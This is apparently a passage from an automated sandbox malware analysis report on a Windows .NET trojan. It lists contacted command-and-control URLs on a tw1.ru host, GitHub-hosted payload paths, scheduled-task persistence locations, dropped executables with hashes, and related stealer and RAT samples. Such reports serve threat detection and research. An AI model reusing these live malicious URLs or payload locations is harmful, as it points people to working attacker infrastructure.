0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W	true	Avira URL Cloud: malware	unknown
http://ca91547.tw1.ru/@==gbJBzYuFDT	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com	LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://raw.githubusercontent.comd	LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://raw.githubusercontent.com	LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, WinLatency.exe, 00000006.00000002.1878443146.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002C07000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ca91547.tw1.ru	UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmd	UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ca91547.tw1.ru/	UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002C07000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ca91547.tw1.ru/L1nc0In.php?kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU&42967b720727e4e345f9f350ee86f8	UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002C07000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.199.109.133	raw.githubusercontent.com	Netherlands		54113	FASTLYUS	false
92.53.106.114	ca91547.tw1.ru	Russian Federation		9123	TIMEWEB-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575246
Start date and time:	2024-12-15 00:21:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	45
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LaRHzSijsq.exe renamed because original name is a hash value
Original Sample Name:	74f1fcf96c9e31f50f6d83072ec68d07.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@54/30@2/2
EGA Information:	Successful, ratio: 28.6%
HCA Information:	Successful, ratio: 64% Number of executed functions: 425 Number of non-executed functions: 74
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Registry.exe, PID 2568 because it is empty
Execution Graph export aborted for target Registry.exe, PID 8144 because it is empty
Execution Graph export aborted for target UplbXNLOfTNXjbhPJQLmKdgT.exe, PID 2872 because it is empty
Execution Graph export aborted for target UplbXNLOfTNXjbhPJQLmKdgT.exe, PID 4412 because it is empty
Execution Graph export aborted for target WinLatency.exe, PID 7636 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: LaRHzSijsq.exe

Simulations

Behavior and APIs

Time	Type	Description
18:22:06	API Interceptor	1x Sleep call for process: LaRHzSijsq.exe modified
18:22:26	API Interceptor	12790392x Sleep call for process: UplbXNLOfTNXjbhPJQLmKdgT.exe modified
23:22:18	Task Scheduler	Run new task: Registry path: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe"
23:22:18	Task Scheduler	Run new task: RegistryR path: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe"
23:22:18	Task Scheduler	Run new task: UplbXNLOfTNXjbhPJQLmKdgT path: "C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe"
23:22:18	Task Scheduler	Run new task: UplbXNLOfTNXjbhPJQLmKdgTU path: "C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.199.109.133	cr_asm3.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	gabe.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	5UIy3bo46y.dll	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
	SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
92.53.106.114	jD1RqkyUNm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	cb62343.tw1.ru/ProviderpythonjsBigloadFlowertemp.php
92.53.106.114	http://cl41155.tw1.ru/clients/	Get hash	malicious	Unknown	Browse	cl41155.tw1.ru/clients/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	185.199.109.133
	c56uoWlDXp.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	gjvU5KOFhX.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	185.199.110.133
	svhost.vbs	Get hash	malicious	Unknown	Browse	185.199.111.133
	hvqc3lk7ly.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	185.199.111.133
	j87MOFviv4.lnk	Get hash	malicious	Unknown	Browse	185.199.108.133
	DvGZE4FU02.lnk	Get hash	malicious	Unknown	Browse	185.199.108.133
	j3z5kxxt52.lnk	Get hash	malicious	Unknown	Browse	185.199.108.133
	zpbiw0htk6.lnk	Get hash	malicious	Unknown	Browse	185.199.110.133
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	185.199.111.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	151.101.193.91
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	185.199.109.133
	c56uoWlDXp.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	151.101.193.137
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	151.101.193.91
	https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://u13974777.ct.sendgrid.net/ls/click?upn=u001.1GFl1p-2BBYL-2Bhgs5F-2B0NOkrtNxvRU5lHyHn9X7Gay0rMweTw4Bty7YorCE1pBfo679HN2Nod-2BfRWA-2FvzNVU6n0ycgVO9YFLntVOrRszMr10A-3DE-mj_xaXJc0NsC5WAXuVv6HNgzGH9nxkzD8xRdi-2BQVNVTAgV30zfSKc1z4I-2Bc6Qx1hEzdtXusfFTLvSScqQmgK1DgmCe6NsmhCnbLpmZI7EPM56c0IpOXy2jX8FUofqX-2FLwkrDNu-2BJ8VdkhW-2BcibVgB56YvBarWAJ68QdVLDk-2BreYFAbG2RxK5FI2ZOf8OuVaYqzfkm-2FGiI9tY4Y1XN-2FN7Uh8Vtzi-2FP-2B8s9qjOHBuznAYsq-2B4GCewCcJExgcNnMrLH-2B3Pv6vH6wzFQkN2aMTddwwaWvcIkZYQDF7aLn1FYUQMocCkCTJEmkArX-2Bdrge72rYVSFN-2FsI6AAcwN5SA74y-2B4g6Q-3D-3D	Get hash	malicious	Unknown	Browse	151.101.65.44
	http://vzgb5l.elnk8.com/83885021a686e36f9150aaf51cbc0afdh	Get hash	malicious	Unknown	Browse	151.101.2.217
	https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document	Get hash	malicious	HTMLPhisher	Browse	151.101.129.181
	18037.doc	Get hash	malicious	Unknown	Browse	151.101.67.6
TIMEWEB-ASRU	jew.m68k.elf	Get hash	malicious	Unknown	Browse	176.57.212.213
	2.exe	Get hash	malicious	Unknown	Browse	92.53.116.138
	Order Ref SO14074.pdf.scr.exe	Get hash	malicious	Unknown	Browse	5.23.51.54
	rPO49120.scr.exe	Get hash	malicious	Unknown	Browse	5.23.51.54
	rPO49120.scr.exe	Get hash	malicious	Unknown	Browse	5.23.51.54
	DCRatBuild.exe	Get hash	malicious	DCRat	Browse	185.114.245.123
	guia_luqf.vbs	Get hash	malicious	Unknown	Browse	92.53.116.138
	guia_evfs.vbs	Get hash	malicious	Unknown	Browse	92.53.116.138
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.178.47.86
	CPYEzG7VGh.exe	Get hash	malicious	DCRat	Browse	185.114.245.123

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	185.199.109.133
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	185.199.109.133
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	185.199.109.133
	FEDEX234598765.html	Get hash	malicious	WinSearchAbuse	Browse	185.199.109.133
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	185.199.109.133
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	185.199.109.133
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	185.199.109.133
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.109.133
	file.exe	Get hash	malicious	XWorm	Browse	185.199.109.133
	gjvU5KOFhX.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	185.199.109.133

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	893440
Entropy (8bit):	6.2298406544945495
Encrypted:	false
SSDEEP:	24576:22F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr:2ztfRZsHw+VEcj
MD5:	B26EA50DE8F1DA57B78E045EC904E19A
SHA1:	8137C1FE0633482DD4C42BF2ABB7C3B042877E38
SHA-256:	78FEE25CC75AFFB005B5CA205328F5E0E44BA153E018FAD0A7720C96940F5B9F
SHA-512:	29B76A3A8CB0435013E46198BAB2755F3DE84473CFC8A8B3D26DD3E2B05EEC0BB1409E9CB43235D4FD6BBE5D30C1978F58ACBA89D9172E575D94262DC11D1FFE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................h...6......~.... ........@.. ....................... ............@.................................0...K.................................................................................... ............... ..H............text....f... ...h.................. ..`.sdata.../.......0...l..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\ee2ad38f3d4382

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	ASCII text, with very long lines (548), with no line terminators
Category:	dropped
Size (bytes):	548
Entropy (8bit):	5.885962858857822
Encrypted:	false
SSDEEP:	12:Y8SB0jJit5tjdmwbdZ9CWzoLaYLzi+HgSv:Y8y0erjdmGdZwWzoDv
MD5:	99711D3B3D85621FF5A25CA944DA9B36
SHA1:	6EBA7F7C8AD14561481CF24930F605384A9F5A12
SHA-256:	609B347798A4D58FECFE74F78B33C907016236113AFCDE170CAAEF5CD25A482F
SHA-512:	4831629B31B401DE84932DA917FCE52341A24EC0F61B0AA72822BF243AED277F4A7F05EA3C803233476555CCF49D06A55352FD34A8AEB5EC371359213FA8ED39
Malicious:	false
Preview:	WsMNInhWXI9pzKSQEVFS4kOJcF8KNZu8YuLKiEYubgwNUPWe3fJCS6nveCuCoWI7YBQF9IsA6U0XyAzNteRsQrpbGZqgUVFFXyyT8QevwJF7GQ7dNhTKFarqVz8jcMqlPu9ALfOc9f5HmsU0cMSwC597GI7JS5SkdesVQ6RsS0KjfkEneHHQ33iTuC3DhEJENUoI98kf5kdLvacgDUoLyCqj5ZkNDNKOqFVK65nfglVTZWhUkW9Na8QKnEMkYWcrZPfpERkIrJoMrXKj1QmqN7xszKg2tCHJJn3J12PTw1gRUEdQ3ntHtvdccw03vrZoBeDDdBs8AT3WbgYurP8GTAaXJarEBVhEc1PzAZx24uGZ1HB5YFMftSUBEp3CTn7pwy3jRiuRcFLi3AfCZwp5JCVJhOvUfviRxbnDOco0V4DnHwHEK1mh8BftdtCCxZwrh4vcWcy7HzkP8sBuHrKoIASv63keZlD5IWGNBorsDpaJbPvvsR5FPHjgl9gc2UhfvpHmlytc9blckJUqIywIq7pAxkmBIO0sI4Xw

C:\Program Files\Common Files\microsoft shared\330defd625eedf

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	ASCII text, with very long lines (936), with no line terminators
Category:	dropped
Size (bytes):	936
Entropy (8bit):	5.92134759230669
Encrypted:	false
SSDEEP:	24:splzi7UZW0MRD4T4yNhR4aEnFZFGxphah6:HAcRD4sGRCnFZEvN
MD5:	B8673E29F899144109376EE1739CD7CC
SHA1:	03FF0FC3CCF73D67C1002C1BDF5C69923CF71143
SHA-256:	7E425EFA5B2328A1E3AC5CA6A8E3116C3DC22870FBC524CA316F2445A2B5ADE1
SHA-512:	64E661707A95F5469F8EB06C1BD9B929D9A869644C26E77B8A670A40C0B880FF3781F66D97AEFE46EF067D6BBC23E190288B3FBDECC1F341DB328DF5DA108DB2
Malicious:	false
Preview:	1CZY6sMWtyAXABkKOMEOwK3IWfkxgJ5UFF339q8c3hAiMcHBmnzNCKJrIQCaIZ0j2qS4IrLhOlVPKU63YiL2TsR46LusohUdqaqfJN34cR9by3hyUIBjO8PKYY766d3qR1itoatKpQZCt0FDo6XffuPsKfGvQ689YSJ7UxJ3Z038iNbiS3R9FXKgm0jIT74sRanaqIs1xdGp1RJ6EidWo93AInVeOAkb6KqHjB1JLaMlQfpUqmEvdiDSgmRDxOnw3psqkCXDqTLOwRun7Ayl6y7XGYl6tyW6xaslw9toPAFKWzgP2oGwaBzErVjMaaT16ObVjI08QJW5txBR1VEEskgwln4bahNyqNNIYKpuyIfQo3V4URUFWOJWrpu5OZht6iOfk22rqTQjEQHrS9HIMIccD0atZufYkvTGozTbYnYC8jRahCmORZhyFwctbJR5y29T7BDdqqtitZdej9LXHQHLOfA1Wk9PVcOGk8dg9Jilp8EpS8Kc74yhuyEcALGFqeMQLX3kgpX8sffPaUiYahRboqVv3BfyCc5Lvyd5Ej5Sg0zPSyCpmrpJNvlfCIreJj5PkUel0nU0l84x1FcE90LVxw8AM8262aI75jp8Uaz8XzhO0yo6pmfTXkcyWdZ2vY7K072RaeuiBM78OtKYU5RQ5zjVH0m1B6N91WY25WfL26SKmejmSAhzHrPAXhKk12hE98G1VSd8ZFY8gYsnQAiAZX2JGXeXM5T9ZOLoXrQAhjZBTRd9zgT1TgolG6u8xFwdwYiSNEPitid0700z3fipmbq2jkha6SNbx6O5sLwuRuIvCynPG5ERgG1UspsmgzlbVBDBl5GstxY2T40v6STBN55qE4MCcJNbIraAvlnLyWiss8Axz7qOfkNZGW7rsEQkj6umezAVoIM0XM7F3ZNec96hdA4Yo6duG7Iw

C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	893440
Entropy (8bit):	6.2298406544945495
Encrypted:	false
SSDEEP:	24576:22F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr:2ztfRZsHw+VEcj
MD5:	B26EA50DE8F1DA57B78E045EC904E19A
SHA1:	8137C1FE0633482DD4C42BF2ABB7C3B042877E38
SHA-256:	78FEE25CC75AFFB005B5CA205328F5E0E44BA153E018FAD0A7720C96940F5B9F
SHA-512:	29B76A3A8CB0435013E46198BAB2755F3DE84473CFC8A8B3D26DD3E2B05EEC0BB1409E9CB43235D4FD6BBE5D30C1978F58ACBA89D9172E575D94262DC11D1FFE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................h...6......~.... ........@.. ....................... ............@.................................0...K.................................................................................... ............... ..H............text....f... ...h.................. ..`.sdata.../.......0...l..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Multimedia Platform\330defd625eedf

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	ASCII text, with very long lines (615), with no line terminators
Category:	dropped
Size (bytes):	615
Entropy (8bit):	5.885009739756597
Encrypted:	false
SSDEEP:	12:axo19zVyCYvPopD8FxG4l56+uhfgUumUBcnT3gL:RzVRqPo58FxG4lcpfgURnm
MD5:	B966FCF3479FE6386CD6FC7549C5F390
SHA1:	E4C603FB4F1BAEB042F4A3515C0305C569E0476B
SHA-256:	C9FD3A7A78BD6EE4A596F8EAB81B42FF974D2C4E4C014088100F8146EA025F1D
SHA-512:	CEB8F0C312EAB05A2C316F15EE4FE5ED64B127A13E7526EEA8008DB809F5BC4A61AF0720494CD0B10D6AACE4BAA71D2B62289BA1DB0824F5264F0E91B07311C1
Malicious:	false
Preview:	nFgHtxsENRZKNQQqyVsJLRnHBuYLQioZxVEwJxGbnLozqdNfuqTQ7CaWbYF9Ygypm9W1LdgBPQg9mxbig3bjOXcv5rVvrHCGX9MqGWTQJSBqgatn6hceFOaPhl5dIvTIOZlnkubKkKZ6WvOe8ryJohBIi7JfazIY82cHzGDMGS45ze3wXbfb6JeqYdEnk6tvCA7dTHp1omDWnGTDEXH9TqcyYvtVBZlKiI2yhZdQvnxTGHCSJBiNyubViIEhXT0OA3xeNffo41Nq3IsQsbMA0YWyrhPZV52cxiSNTiEof4T6gubaZxy6H0Xmh9xpPGT89v3Vzf7KWie6EZR6Gz9hG5U6LqqUuZYYkU7u1Gk40okjVahHr0jZGw1Da6JJzmZ6JFVuchE9PFqcUvluIim4z8Syc3T56aEOOnZQExpKvkKBFZspVZBQ9fHKxhRiNJCyAcNqWUpU3cIPyQsDKokhZyOtgOchfH7mhWAnLCSAtrXhW1WhyOXiifYMNeKH2HyvfgsbPF2IWkxsarXp15sRtYDB7yZr1KHl2lB0I5RtWOM8rqwgHeQ7ZgBGcqebpLQLcLzypgg6o95fMFUQC3jX4KMVj5XcbzEL7Afg070

C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	893440
Entropy (8bit):	6.2298406544945495
Encrypted:	false
SSDEEP:	24576:22F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr:2ztfRZsHw+VEcj
MD5:	B26EA50DE8F1DA57B78E045EC904E19A
SHA1:	8137C1FE0633482DD4C42BF2ABB7C3B042877E38
SHA-256:	78FEE25CC75AFFB005B5CA205328F5E0E44BA153E018FAD0A7720C96940F5B9F
SHA-512:	29B76A3A8CB0435013E46198BAB2755F3DE84473CFC8A8B3D26DD3E2B05EEC0BB1409E9CB43235D4FD6BBE5D30C1978F58ACBA89D9172E575D94262DC11D1FFE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................h...6......~.... ........@.. ....................... ............@.................................0...K.................................................................................... ............... ..H............text....f... ...h.................. ..`.sdata.../.......0...l..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\330defd625eedf

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	ASCII text, with very long lines (902), with no line terminators
Category:	dropped
Size (bytes):	902
Entropy (8bit):	5.910265992408248
Encrypted:	false
SSDEEP:	24:kIV7ftPJj8DAMYqdcwgqhsI3Ext0Mznr3uKUDMu7U/NLztf:d1hj3IBkI0r0Mznrungu7UFx
MD5:	984DB4E3E7E9A803EACCF5F312C551B7
SHA1:	DD4188D1D9569D17C4BA2CFE52C9893396F7723C
SHA-256:	10B3989AF28A0F1825772BE339FEDAF83C0F50F1C0CC3C246043E41DC9FA5C5C
SHA-512:	0471D6A7E098A32D632B72954A66C00EF045EC9F9A77D2297A3ACEE7F56B9E756DC9569F13DCB553AFF302A164CA25954B8EBC67FEDDD39132B64301741B4A2C
Malicious:	false
Preview:	WWNZwl3QS8eOuIEfy4uhLjxZEC9Zl1wuDBAFNZSjDuMhWsGb2yef08sxixUtmepbMtLtI9RZmKdbWQDW5hgxWR4ETNgaEi7jFvVnhXT3gE3peQaSu8yE71E4yGa4c1UDN4Vl5ZyiOnQSYPjCxOqFu2mNqaya7Zbptzbk5yWUKP0UlwgjhYGNLOTURI4ekYlyMliix8G91V5eCSm44O3jSNefgHSx32twoBIAO7wiRHVzTyS9fAkWeCf8GDCppTF9lJ0AJmq6cUSL2oLrzTR3SXRlfJ3L5G27CVOJ7Rz3To4KuUGb1V0WCLrN2Oe9sfBVbUJgaCuhdXjndG1LDbTkQg40oARsxzLymisZKjBzkT3olDuvWT6QLbF5aS1ZuBunMvB4YcAeae96mPOkQfVd34nLdw91rlEjiPc0CzX4Sb0qcISKERJPpQtSHzaldIwyaZXWxYiaIbLcE6tVdyxacy3SgJtMZvaKpBPCu6WqstGOFROKGFHoUVWmgF0npVBWAAwCrrkhcHstroMO5iGTowzTpnfpFsAWruNEeLdYejMMnn412lsGPrsOKdXDL5btGVB7aHtuEryEjmpBtnweA4H9C93BxZMjHcFSm6au18Bh3nohxWUiI7tMOB4bNs6peO6HhXZwMBmC2jGZUWObFoaKt3DkB9gJBWCoqhAZ6hVGUrUo4fG1eej0ywXnTyuMfdAfgbsxVyfiSTzBjZpg3ophxM04JXFHwIl1qyHdxTgp9Bhe6VE4IOT0ydsUlxn7sXvKr8VuRMsjH9hvoV7xSL9iyvDNFx19pj6mQXw8ATn5fusy56pP0zohYMV64HpeVt4iC5fRj9w9hDDECOSIHlJz4ZNECzD3oIkv0Jv9bYq0Cp9VJQ3qzgWtkEonrbOt63UYcR

C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	893440
Entropy (8bit):	6.2298406544945495
Encrypted:	false
SSDEEP:	24576:22F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr:2ztfRZsHw+VEcj
MD5:	B26EA50DE8F1DA57B78E045EC904E19A
SHA1:	8137C1FE0633482DD4C42BF2ABB7C3B042877E38
SHA-256:	78FEE25CC75AFFB005B5CA205328F5E0E44BA153E018FAD0A7720C96940F5B9F
SHA-512:	29B76A3A8CB0435013E46198BAB2755F3DE84473CFC8A8B3D26DD3E2B05EEC0BB1409E9CB43235D4FD6BBE5D30C1978F58ACBA89D9172E575D94262DC11D1FFE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................h...6......~.... ........@.. ....................... ............@.................................0...K.................................................................................... ............... ..H............text....f... ...h.................. ..`.sdata.../.......0...l..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Default\AppData\330defd625eedf

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	151
Entropy (8bit):	5.728956583917267
Encrypted:	false
SSDEEP:	3:z1AejZCOc93SyOBd0OG2eUUKmFlxIN3HwzKWkuJuxTGRDhzRU5VX:zKejZCOcAyOr0OUUUKmjxIO3Dhze5h
MD5:	707EEEFA5DB60E952171129E93994117
SHA1:	4D4630D1260B480D8112BE5EBC12EE597EAFC1DB
SHA-256:	9A1F457F9F81641901953CE429DB612990CC22BDC1C56CC81FE8544E657F37A2
SHA-512:	8696EA205292C3C18229BEFFFF9ED5D264918828D6D4D3F8E763FC24333098E86B28DD4D95947F1D238748CEC9EEF82BB28359D1F08229503149B2BAD253A7C7
Malicious:	false
Preview:	GJWPe6j557kKH2Bd5y2Tssgk9kwbr7WkdxQk4EuM14eL3rEBAv1jWsaXmwQ4KHO7k9qTmai1DpbyOUqSfvb5GxOvX27Ix0Cupgl3AvYjM9gqRlJSF8ZYqS1xv56tdaENnrIstxRuX1tGRhdvtpCzboD

